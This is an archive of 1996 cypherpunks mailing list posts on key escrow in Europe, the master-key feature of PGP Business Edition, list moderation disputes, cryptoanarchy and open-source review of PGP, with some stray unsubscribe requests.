>From: "Timothy C. May" <tcmay@got.net>
>Subject: Re: FW: Now we have it all
>Sender: owner-cypherpunks@toad.com
>
>At 10:47 AM +0100 11/6/96, Butler, Scott wrote:
>>>
>>Abaddon wrote:
>>
>>>>susbscribe
>>
>>Surely we have seen it all now.
>>I find it hard to believe that a word like
>>suscribe....subsribe....subcribes..
>>SUBSCRIBE..is so difficult to spell correctly.
>>
>>:-)
>
>This is actually steganography. Various spellings of "subscribe" are being
>used to communicate a bit or two per message.
>
>Actually, the practice becomes a code, as in:
>
>"Suscrive if by sea, sudcribe if by land."
>
>
>--Klaus! von Future Prime
>
>
>Please unsubscribe me from your list
>
>
>Hendra





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hendra Halim <mestimas@elang.idola.net.id>
Date: Wed, 6 Nov 1996 21:41:47 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Cypherpunk mailing list
Message-ID: <9611070545.AA26140@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


>From: CHALAKKI@worldnet.att.net
>X-Sender: CHALAKKI@postoffice.worldnet.att.net (Unverified)
>To: Cypherpunks@toad.com
>Subject: Cypherpunk mailing list
>Date: Wed, 6 Nov 1996 22:38:08 +0000
>Sender: owner-cypherpunks@toad.com
>
>Please put me on your mailing list
>
>
>Please unsubcribe me from your list



Hendra





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Thu, 7 Nov 1996 12:53:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] If the shoe fits, wear it [VULIS]
In-Reply-To: <01BBCBF6.6CBDEC00@ipdyne9.vir.com>
Message-ID: <32824C50.227B@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


networks@vir.com wrote:
> 
> Rich Graves Wrote:
> 
> >You [meaning Vulis] are of course free to rant and rave about his 
> >[John's] hypocrisy, but expecially since you'll always be able
> >to post to the list, at least under a nym (the only thing he's
> >prevented is your reading the list under your own name), you're
> >only proving yourself to be an idiot.
> 
> The nature of the Internet means it is extremely difficult for John
> to prevent Dr. Vulis from either posting using a pseudonym or
> having messages forwarded to him.  IF it were possible to prevent
> Vulis from either reading messages or posting do you think John
> would have done that too?  Just curious.

I think that gets into "how many angels can dance on the head of a pin" 
territory, because it just isn't, and I certainly don't speak for him. 
But...

1. None of the "it was the right thing to do" crowd, which runs the
   gamut from my perspective to Sandy Sandfort's (concurring in
   conclusion, but radically different in reasoning), has said
   to indicate that such action would be totally wrong.

2. In my opinion, such action would deserve strict scrutiny -- not in   
   the legal sense, because it's a private matter, but from interested
   parties, yes. The "hypocrisy" and "arbitrary and capricious"
   judgements should be made and discussed by the users of the list. If
   they(we) think the action is wrong, we'd protest or leave. This is
   a question of persuasion or "voting with our feet," though, not of
   law.

Personally, I wish Vulis would just go away, permanently, and I would 
not consider any nonviolent, non-net-abusing means to stop his ravings 
inappropriate. However, I do not believe that there are any nonviolent, 
non-net-abusing means to stop his ravings, so we're at an impasse, as 
far as the cypherpunks list is concerned. I think that if this became a 
forum for Vulis-bashing, and he were unable to respond, then that would 
be very wrong; but I just don't see that happening. I can think of 
several examples where that kind of thing has happened, some of which I 
thought were reasonable (given the way the relevant forums were 
advertised), others of which I thought showed the moderator to be an 
intolerant, hypocritical asshole.

Given the facts of this case, I do not consider John to be an 
intolerant, hypocritical asshole. Given your hypothetical, and speaking 
only of Vulis, not of "others similarly situated," I would think no less 
of John if he were to decide to implement the technically impossible, 
provided that there was procedural transparency. I.e., announcing what 
had happened and allowing discussion of what happened was the right 
thing to do. Only if he kicked people off without telling the list, or 
lied about his reasons for doing so, or suppressed dissent with his 
actions -- which has happened in other moderated forums, but not here -- 
then would I have a serious [moral and personal, not legal or 
philosophical, since people have the right to be hypocritical assholes 
if they want to be] problem with it.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf =?ISO-8859-1?Q?M=F6ller?=)
Date: Thu, 7 Nov 1996 05:24:54 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: Euro Key Escrow
In-Reply-To: <9611070921.aa15606@gonzo.ben.algroup.co.uk>
Message-ID: <9611071242.AA09360@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


> It is, apparently, true that the EC is considering schemes for key escrow, by
> "trusted third parties"

There is an extensive survey at the European Cryptography Resources page,
http://www.modeemi.cs.tut.fi/~avs/eu-crypto.html

The EU commission's group DG XIII has been discussing key escrow for quite
some time, but they have not yet been able to agree on a position.
Jerome Thorel has posted some rather scaring interviews with EU official
David Herson who is in favor of a key esrow scheme. Victor Mayer-Schoenfelder
reports that crpyo regulation is likely to be delegated to the more liberal
DG XV.

A number of member states, such as Denmark, very unlikely to accept key
escrow.

> ftp://ftp.dcs.rhbnc.ac.uk/pub/Chris.Mitchell/istr_a2.ps

Ross Anderson has analyzed Mitchell's scheme, drawing the conclusion that
"The GCHQ protocal is very poorly engineered." See
ftp://ftp.cl.cam.ac.uk/users/rja14/euroclipper.ps.Z

> I'm informed that this is likely to be introduced into EC legislation, though
> my understanding is that members are not required to actually incorporate the
> legislation. No doubt France will embrace it with happy shouts.

The final decision will almost certainly with the member states, because
cryptography is considered essential for national security.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Thu, 7 Nov 1996 15:49:18 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Is there a Win PGP?
In-Reply-To: <199611071228.GAA22584@mailhub.amaranth.com>
Message-ID: <Pine.SUN.3.95.961107134510.14027B-100000@akamai.pixi.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Nov 1996, William H. Geiger III wrote:
!
> I am not sure exactly how they had this mechanism set up but I am pretty sure this
> was somthing the user had to actively set up as aposed to somthing done automatically
> with out the user's knowledge. 

I have both versions.  They call it the "Business Edition", and the master
key is optional, not required.  The master key has to be in place before
anyone else generates their key, otherwise the master key won't work.  You
have to go in and turn this on so it isn't something that gets implemented
without *someone* knowing.  As for everyone else knowing that there was a
master key generated...

#include <standard.disclaimer>
                    _   __     __  _____            ____
                   / | / /__  / /_/ ___/__  _______/ __/__  _____
                  /  |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/
                 / /|  /  __/ /_ ___/ / /_/ / /  / __/  __/ /
================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Leeds <guestdl@rand.org>
Date: Thu, 7 Nov 1996 14:12:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.SUN.3.95.961107141221.19503B-100000@wilde.rand.org>
MIME-Version: 1.0
Content-Type: text/plain





===========================================================================
Daniel Leeds                                               guestdl@rand.org 
RAND 				                   cosmos@misery.winter.org
===========================================================================

 	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 14:24:49 -0800 (PST)
To: "Daniel T. Hagan" <dhagan@vt.edu>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b0baea80ee121af@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


> If I understand the reasoning, people beleive it is easier to prevent the
> release of strong crypto. techiniques than to remove them once they are
> released.

The reasons underlying this are what I don't completely understand.

> Once a terrorist has strong crypto, why should they stop using it if it
> becomes illegal?

Use of strong crypto would be a tip off that one is a terrorist.

If strong cryptography were unpopular and highly illegal, very few
people would be using it.  This makes it easy to identify suspects.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 7 Nov 1996 11:39:24 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Is there a Win PGP?
In-Reply-To: <199611071228.GAA22584@mailhub.amaranth.com>
Message-ID: <Pine.SCO.3.93.961107141416.26496A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, William H. Geiger III wrote:

> Does anyone know if you can purchace a commercial license from ViaCrypt/PGP Inc. but
> use the standard PGP for commercial purposes?
> 

Yes, that's one way of doing it.  Phil's mentioned this in his PGP doc, as
I recall.  He says, <paraphrase> 'if you use it commercially, you have to
make certain I make a buck off this - either send me one, or buy a license
from ViaCrypt."

However, you should also know that PGP Inc. (formerly called ViaCrypt)
sells *TWO* versions of the software.  The PE (or personal edition)
doesn't have the "master key" feature.  If you don't want to use the
encrypted file recovery, then don't order the software that has it.

In the BE (business edition), there's an option to force Big Brother into
every recipient list.  This means that the boss can put him/herself onto
the list of "encrypt to whom" whether you want him/her there or not.
Also, the BE recognizes some nuances in keys that the freeware doesn't:
You can have "sign only" and "encrypt only" keys.  Thus, you can give
everyone a PGP key for digital signature (because, let's say, you want
those powerful non-repudiation capabilities), but if it's a sign-only key,
they can't encrypt anything with it.

I'm also confident that these "features" are very hackable.  Someone could
easily tweak the copy of the public key for Big Brother so it encrypts to
something for which nobody (who can be found) holds the other half of the
key pair.  I'm sure there are some check digits, but I also know that it's
going to be damn hard, with software sitting on my disk on my PC, for you
to keep me locked out of it for very long.  I'm sure that Cypherpunks
could contribute something valuable in creating the "Hacking PGP 4.0
Business Edition FAQ."  Anyone for a little R&D?

The purpose (as it's been explained to me by PGP Inc.) for the BE/PE
changes was to increase the *CHOICES* that PGP users were being given
- not to change PGP into something with key escrow.  (The secret
keys still are secret - there is no escrow).  Everyone knows full
well that there are many companies who won't ever touch PGP unless it's
equipped with some "fail safe" that permits them to enforce their INFOSEC
policy.  Recovering files that were encrypted by people whom have
forgotten their pass phrases is in line with most corporate policies.

Bottom line:  Buy the version you want.  If you don't like the BE
features, then don't pay for them or use them.

------------------------------------------------------------------------- 
|It's a small world and it smells bad     |        Mark Aldrich         |
|I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
|Back                                     |     maldrich@grci.com       |
|What I paid                              | MAldrich@dockmaster.ncsc.mil|
|For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Thu, 7 Nov 1996 14:31:50 -0800 (PST)
To: "'Dale Thorn'" <dthorn@gte.net>
Subject: RE: Information [for new PGP user]
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961107223034Z-1168@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn writes:
stewarts@ix.netcom.com wrote:
> >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
> >> > I'm a new Cyberpunk!
> Probably wearing a set of Ono-Sendai eyeballs....
> >> > Last,  I would like to know once and for all,  is PGP compromised, 
 is
> >> > there a back door, and have we been fooled by NSA to believe it's 
secure?

> You can read and compile the source code yourself.

[snip, snip]

Really?  All 60,000 or so lines, including all 'includes' or attachments?

I'll bet you can't find 10 out of 1,000 users who have read the total 
source,
let alone comprehended and validated it.

Perhaps.  But one would presume at least one of those 10 users, upon 
finding evidence of a back door or implementation flaw, would have alerted 
the other 990... (Indeed, various folks HAVE pointed out minor bugs, and 
posted fixes.)

Lots of trusted and qualified folks HAVE looked at the source, and this 
increases one's confidence that there are no hidden trap doors or glaring 
holes.  It's always possible everyone has missed something, of course. 
 (Not to mention the "NSA has subverted everyone's compiler" argument. 
 Anyone looked through the compiled machine code with a fine-toothed comb? 
 :-)

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================



begin 600 WINMAIL.DAT
M>)\^(B46`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <+``<`
M#@`>`"(`! `W`0$@@ ,`#@```,P'"P`'``X`'@`C``0`. $!"8 !`"$```!$
M1$$Y,4$V,S(V,SA$,#$Q.3,P0S P04$P,$$U1C8P1 `-!P$-@ 0``@````(`
M`@`!!( !`",```!213H@26YF;W)M871I;VX@6V9O<B!N97<@4$=0('5S97)=
M`.8+`0.0!@!(" ``&@````,`)@```````P`V```````>`' ``0```!\```!)
M;F9O<FUA=&EO;B!;9F]R(&YE=R!01U @=7-E<ET```(!<0`!````&P````&[
MS/7;ZF,:J3XX)A'0DPP`J@"E]@T``.!8LP`#`"X```````,`!A"4;Q>%`P`'
M$,$$```>``@0`0```&4```!$04Q%5$A/4DY74DE415,Z4U1%5T%25%- 25A.
M151#3TU#3TU74D]413I/3E1512PU3D]6,3DY-BQ%1%=!4D121DE'54523T%7
M4D]413I)34%.15=#64)%4E!53DM04D]"04),``````,`$! ``````P`1$ ``
M```"`0D0`0```"\%```K!0``#0@``$Q:1G5E'T5#_P`*`0\"%0*D`^0%ZP*#
M`% 3`U0"`&-H"L!S973N,@8`!L,"@S(#Q@<3`H,R,Q,/9C0$1@(`<'*X<3$@
M"%4'L@* ?0J BPC/"=D[%_\R-34"@ <*@0VQ"V!N9S$P,R\4( L*%"(,`6,`
M0"!$80= 92!4: 6P`Z!W%040= >0.@J+;&DSOC8-\ M5$O(,`18`;QW *F,%
M0',=P'<*P'1S8$!I>"YN$@`%H&W>+B&!'8$@,1WV/B+ (M"*3P.@5 I0+" U
M![" ;W8@,3DY-B. %$5D(,%D!_ N($9L:6<*4 -@82'_(M$@/$DG(> E<"%0
M!^!#>8)B!)!P=6YK(2)G2E #8&(!H&QY'8!E&PK "X!G)P$1\2!O9DDC$6\M
M!F!N9 MP( AE>64HT&QL<R[S*W$E_$QA() C@"; '8 M"&!L)+ >T&L=$'1O
MW"!K*E 'X (@8QT0`'!_)+ "$ 7 *S$LT00`*)!'[% @(8$@$6T$``F +U-9
M)?QT: 20+H$@*-!C\&L@9&\%L". +J(1P/YV'1 I,#) ">$NT0;P"8#C,D I
M$$Y302W")Y >T+9E,V$=L"<$(!'P8PAP[&4_"H4B9UD(8"_@`Y']& !A)+ N
MHB_R`Q ML3'@GR" "&$N<06@#; @>0AAF1'P;&8KI@J%6W,#`-9P(X [<ETV
M;%(I0"M 5'D_+.!!*T @'P`L?C ^`"H`!< Y,"UQ(5!S:R. "X!C"D!D*7,]
MH2=K/Q0'D"<^,F$"0 #0:/L'@ (P<S9=)M ]H2>0!4#K.?$WDB<%0&8+@"2P
M&R#5*@!U*?,Q/?-U$? 1X/\=@!U ,S0WXSCR+= !D ,@_3DT+ J%'0`%0 = 
M`B Y@KTP$64QX"J@-%$NHG8'0/YI*K =P"2P'; KIAN_%C#;"H\<#% $D!' 
M<"M@+.">0D0R2"$M)$B!<W4'@+] P4>A+*%.DRH1,=!O$?#G0^)$\R. =7 "
M($.3*7+_-6!)D GP+G$J$3(Y/C('<&T+4&5!,D#0:5'B"V!W_R. +20S0QSQ
M`" T43CR(# 5,>$@)! P*W$@*$E_2-$P@DE@!1 (8 0@`A!L0FL$($A!5D5/
M,&\_"X!)PD0B,% J4 7 8G7^9S[A+J)1T""1+L$A( >0="XI-FQ,(# $(%"2
M<N=$\$G"+J)Q=4EQ0Z!;DOM8^!>0;RV@.!$%0#CX,N3_,= O@3\1-^$1\%U!
M(5 UP?T%H&Y#H%+$,=!@%#(",@'_*E S,$F04L%=@4X`,I-=07T%P&<+8"EC
M'4 =`$XB2?<UL@= (,!Y!"!;40"0`F#['1 U87(Y\$@A$< $(#!1_S!Q.2$'
M@&%!&P`C@"H1!:#[.A).,2@CP& A+>!!,E3RW3CR(C2R:))/<&)H$4G"YV@&
M8F,XDW(B8^$E($$R^4XQ06YH0U^E,= #8%K _F@XXSAU)+ `P6F1.84#\.<Q
MT"<!0Z%E+2W05P(X4[)B/6$Z+5PM(U!N;S"]2]4]=:]VOW?/>-\]2]5H($IA
M!X)!).!TXFD;/S &D&8=$"S@?"!7&WP0*Q Z,S "0' Z+_0O=WSP+@N >Z 8
M`"YA\2&R+WYT=/DFP'U&%D'_)[ %L%34>^$OLB4`&P`GH2TI871\8"S@0S30
M,C-+)% 2($:!\$%#@=!$9" P@H W-WH&?B- ?W[W(;-[PX4O+. >\(+ -ZT<
MT#F&4('P,X*P,Q(@\C6!\#E#=3^(WXGOBO\7>7Y+U1<A`(W `$ `.0"@<^Y*
M^\R[`0,`\3\)! ```@%'``$````Q````8SU54SMA/2 [<#U);F9E<F5N8V4[
M;#U,04Y$4E4M.38Q,3 W,C(S,#,T6BTQ,38X``````(!^3\!````2@``````
M``#<IT#(P$(0&K2Y" `K+^&"`0`````````O3SU)3D9%4D5.0T4O3U4]3D]6
M051/+T-./5)%0TE0245.5%,O0TX]5%5.3ED````>`/@_`0```!4```!*86UE
M<R!!+B!4=6YN:6-L:69F90`````"`?L_`0```$H`````````W*= R,!"$!JT
MN0@`*R_A@@$`````````+T\]24Y&15)%3D-%+T]5/4Y/5D%43R]#3CU214-)
M4$E%3E13+T-./5153DY9````'@#Z/P$````5````2F%M97,@02X@5'5N;FEC
M;&EF9F4`````0 `',)#3L?SYS+L!0 `(,-#&44O[S+L!`P`--/T_```"`10T
M`0```! ```!4E*' *7\0&Z6'" `K*B47'@`]``$````%````4D4Z( `````+
M`"D```````L`(P```````@%_``$```!0````/&,]55,E83U?)7 ]26YF97)E
M;F-E)6P]3$%.1%)5+3DV,3$P-S(R,S S-%HM,3$V.$!L86YD<G4N;F]V871O
3+FEN9F5R96YC93(N8V]M/@#X?C(R
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 14:40:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b0eaea81512961e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


>Jeremiah A Blatz wrote:
>ph@netcom.com (Peter Hendrickson) writes:
>> It appears to be widely believed that cryptoanarchy is irreversible.
>> Everybody believes that the race to deploy or forbid strong cryptography
>> will define the outcome for a long time.
>>
>> I can't think of a reason why this should be so.
><snip>

> Well, once I've got my strong crypto and electronic commerce, and 20
> or so virtual identities to do things for me, and the gub'ment can't
> tell what money I'm making and spending, so they can't tax me. So if
> they can't tax me, and they can't tax lots of folks, then they can't
> pay their jack-booted thugs. So the goverment becomes irrelevant. It
> can't support a huge police state infrastructure, and certainly can't
> but mega-crays to break my crypto, so how're they going to retain
> control?
> When we say anarchy, we mean anarchy.

This only works if there are large numbers of people who think it is
a good idea.  Otherwise, the resources of the Federal Government
may be directed quite effectively against a small number of people.

If you can get a life prison term for your strong crypto you may
hesitate to use it.  If not, then you may get to be an example
for everybody else.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Thu, 7 Nov 1996 11:40:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Who owns cypherpunks
Message-ID: <199611071940.OAA83990@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Nov 08 02:39:25 1996
Jim Choate writes:

> There is one important legal aspect which the operator of the Cypherpunks
> mailing list has opened themselves up for with this action. In short
>  they
> have now opened themselves up for defamation and liable suites by
>  imposing
> an editorial policy on the contents of this list (1).

I fear you mean "libel," and I think not. (see below.)

<snip>

> Censorship is censorship, irrespective of the source of the limitation.

Oh good. I think I'll sue the Miami Herald for not printing my last letter 
to them. After all, they "censored" me, right? NOT!!!

> Free expression is impossible in an environment of censorship. The right
>  to
> speak not only implies a right to not speak, it also implies the right
>  to
> emit complete mumbo jumbo.

I'm afraid we have an excess of living proof around here, lately. <sigh> I 
am beginning to see why people vote the way they do...

>The actual content of the speech is irrelevant.
> 
> The Constitution guarantees freedom of speech and press. This does not
>  imply
> in any way an abrogation of responsibility by the party speaking or
> distributing it. Only that they would not have limitations on their
>  actions
> imposed by the federal government.

I am beginning to wonder if you are serious about promoting John to the 
level of "the federal government." If this was a joke and I don't get it, I 
ma sorry to have taken you seriously.

>                               ARTICLE I. 
>  
>       Congress shall make no law respecting an establishment of religion, 
> or prohibiting the free exercise thereof; or abridging the freedom of 
> speech, or of the press; or the right of the people peaceably to
>  assemble, 
> and to petition the Government for a redress of grievances. 

[Would that it were so, but...] John is not in the U.S. Congress, and even 
if he were, this list is _his_ property, not mine, and not yours. He can do 
with it what he likes.

<snip>

> I have argued in the past that this list is a defacto public list because
>  of
> the way it is advertised and to the extent it is advertised. All the
>  protests
> by the operator to the contrary will not convince a court.

Name one ad for cypherpunks. This list is John's property, and he could cut 
us all off tomorrow for any reason or no reason. Deal with it. I seriously 
doubt that even the most socialistic judge in the U.S. (and there are 
plenty) would buy this kind of garbage.

> Hope you folks have a good lawyer.

I'm sure John's quaking in his boots. Reread my campground analogy, and try 
to refute it. You can't. Go start your own list with no moderation. Go start 
a more moderated list than John's, like Perry's will be. Do whatever, but 
this moronic thread must end! It is very strange to me that the people 
asserting some sort of "implied contract" among cypherpunks have yet to 
offer to pay even *one* month of John's costs. If you want to call the tune, 
then pay the piper (if he lets you). If you don't, then be quiet about what 
you're obviously ignorant about.
JMR


Please note new 2000bit PGPkey & new address <jmr@shopmiami.com>
This key will be valid through election day 2000.
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71
Please avoid using old 1024bit PGPkey E9BD6D35 anymore. Thanks.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMoLjsTUhsGSn1j2pAQFE6AfQgbWxLHSqdGMsKEg+jUSlMIsctR8MIQ6i
ZU+7JFoSiAREYIrsrlMs7AYsuzLvaGYLTdlT3reC9EvmWPchfawV+tYzBlKZkLs3
vS6PTghqovDheIiEmwr+E4zq9yuV/ElGs7ZOuO4Ob9LuwSx7Tm+m6OQNGuOoGjpV
Y6Gc6vFZ2fEb/Yt3qadQF1Q2Zlf+qjVjglilOefoe2Q+7y7FhYysTvlLGqc42h0P
M5J/fbZ3RtpT6dtkT7sqHvj4eZtDMpdn+bXseJkQv4jsbolTyTGR88ee3HU1P/I7
ywWPtOZdoPpP6lSraF0S+PxBOEpkeTRI84Xxw1Jbtblx9Q==
=014g
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Nov 1996 11:42:00 -0800 (PST)
To: attila@primenet.com
Subject: Re: Group order for "Secret Power" ... (San Francisco Bay Area only)
In-Reply-To: <199611070610.XAA18229@infowest.com>
Message-ID: <Pine.SUN.3.94.961107143847.13280B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996 attila@primenet.com wrote:

> In <v03007800aea4b053298a@[207.167.93.63]>, on 11/05/96 
>    at 12:53 AM, "Timothy C. May" <tcmay@got.net> said:
> 
> -.At 1:14 PM -0800 11/4/96, Ernest Hua wrote:
> -.>I'm looking for 19 other people interested in "Secret Power" (Craig
> -.>Potton Publishers has indicated that there is a discount for 20 or
> -.>more copies).  If you are in the San Francisco Bay Area, please
> -.>contact me by phone or E-Mail.
> 
> -.Just wondering...doesn't such a call for a group purchase of such a
> -.dangerous book constitute a RICO (Racketeer-Influenced and Crypto
> -.Organizations Act) violation?
> 
> -.--Tim May
> 
>         I trust your RICO (Racketeer-Influenced and "Crypto" 
>     Organizations Act) is tongue in cheek?   The original title was
>     "Corrupt" not "Crypto," though I am sure our friendly 'rules for
>     them and rules for us' racketeering influenced corrupt organization
>     for a government could define it whatever it to suit their
>     purpose....
> 
>         as to the suggestion/question --how would you contstruct the
>     group purchase of a book to involve RICO?   "racketeering" is 
>     defined as a criminal association whose purpose is to intimidate 
>     others and to deny them theor pursuit of the American dream... 
>     (over-simplified).

See my outline some time ago on the RICO statute and related laws.

I'll dig it up and repost it if there is enough interest, or write another
summary.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 7 Nov 1996 11:45:31 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Validating a program
In-Reply-To: <3281FB84.3560@gte.net>
Message-ID: <199611071941.OAA13267@homeport.org>
MIME-Version: 1.0
Content-Type: text



Dale Thorn wrote:
| stewarts@ix.netcom.com wrote:
| > >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
| > >> > Last,  I would like to know once and for all,  is PGP compromised,  is
| > >> > there a back door, and have we been fooled by NSA to believe
| > >> > it's secure? 
| > You can read and compile the source code yourself.

| Really?  All 60,000 or so lines, including all 'includes' or attachments?
| 
| I'll bet you can't find 10 out of 1,000 users who have read the total source,
| let alone comprehended and validated it.

	The fact that most readers have not examined it does not mean
that the availability of the source is not important.  If the source
was tightly held, perhaps some experts would have seen it.  Thats not
likely, security experts are in high demand today, with companies
paying a lot for their time.  Phil could not have competed.

	In addition, up and coming experts, curious amatuers, and
students couldn't have looked at it.  Having your protocol open to
wide review is a good thing even if few people take advantage of it,
because you may hire the wrong experts.  The experts you hire may miss
something.  Someone may have a new attack under development, and not
be able to try it against your software.

	The multitude of hackers who ported pgp also contributed a
large stack of bug reports and fixes.  Without source availablity, the
mac, os/2, amiga & UNIX ports would be held up, or perhaps not exist.

	Publicly distributed source code also tends to be of higher
quality (see Fuzz Revisited, at grilled.cs.wisc.edu)


	In short, if you're paranoid, feel free to look over the
source.  But the fact that most people have never peeked under the
hood is not a strike against pgp at all.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Nov 1996 11:39:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) Re: Euro Key Escrow
Message-ID: <199611071939.LAA19203@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the SSL-users mailing list.

------- Forwarded Message Follows -------
Subject:       Re: Euro Key Escrow
To:            ben@algroup.co.uk
Date:          Thu, 7 Nov 1996 13:42:16 +0100 (NFT)
Cc:            cypherpunks@toad.com, ssl-talk@netscape.com, ssl-users@mincom.com,
               ietf-pkix@tandem.com, ben@gonzo.ben.algroup.co.uk
From:          um@c2.net (Ulf =?ISO-8859-1?Q?M=F6ller?=)

> It is, apparently, true that the EC is considering schemes for key escrow, by
> "trusted third parties"

There is an extensive survey at the European Cryptography Resources page,
http://www.modeemi.cs.tut.fi/~avs/eu-crypto.html

The EU commission's group DG XIII has been discussing key escrow for quite
some time, but they have not yet been able to agree on a position.
Jerome Thorel has posted some rather scaring interviews with EU official
David Herson who is in favor of a key esrow scheme. Victor Mayer-Schoenfelder
reports that crpyo regulation is likely to be delegated to the more liberal
DG XV.

A number of member states, such as Denmark, very unlikely to accept key
escrow.

> ftp://ftp.dcs.rhbnc.ac.uk/pub/Chris.Mitchell/istr_a2.ps

Ross Anderson has analyzed Mitchell's scheme, drawing the conclusion that
"The GCHQ protocal is very poorly engineered." See
ftp://ftp.cl.cam.ac.uk/users/rja14/euroclipper.ps.Z

> I'm informed that this is likely to be introduced into EC legislation, though
> my understanding is that members are not required to actually incorporate the
> legislation. No doubt France will embrace it with happy shouts.

The final decision will almost certainly with the member states, because
cryptography is considered essential for national security.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Nov 1996 11:39:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: (Fwd) Euro Key Escrow
Message-ID: <199611071939.LAA19225@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the SSL-TALK mailing list.

------- Forwarded Message Follows -------
Subject:       Euro Key Escrow
To:            cypherpunks@toad.com, ssl-talk@netscape.com, ssl-users@mincom.com,
               ietf-pkix@tandem.com
Date:          Thu, 7 Nov 1996 09:21:55 +0000 (GMT)
From:          Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Cc:            ben@gonzo.ben.algroup.co.uk
Reply-to:      ben@algroup.co.uk

Someone, somewhere, posted a rumour that Europe was about to go for a key
escrow scheme known as "Royal Holloway".

I have done a little research and gleaned the following:

It is, apparently, true that the EC is considering schemes for key escrow, by
"trusted third parties" (trusted by who, I'd like to know?). "Royal Holloway"
is one of these schemes. It is named after the college of origin, if anyone
cares. It essentially revolves around each pair of TTPs sharing two out of
three parts of a key, and generating the third part for each of their users.
The idea is that either of the TTPs who generated keys for an encrypted
message exchange can decode it (by using the private key of their "client" and
the public key of the other TTP's "client").

Full details can be found at:

ftp://ftp.dcs.rhbnc.ac.uk/pub/Chris.Mitchell/istr_a2.ps

This is in PostScript. I'm not aware of any plain text versions.

I'm informed that this is likely to be introduced into EC legislation, though
my understanding is that members are not required to actually incorporate the
legislation. No doubt France will embrace it with happy shouts.

Of course, it is our duty as netizens to resist this kind of rubbish, and I
encourage you to write to your MP/EuroMP (or local equivalent).

Cheers,

Ben.

-- 
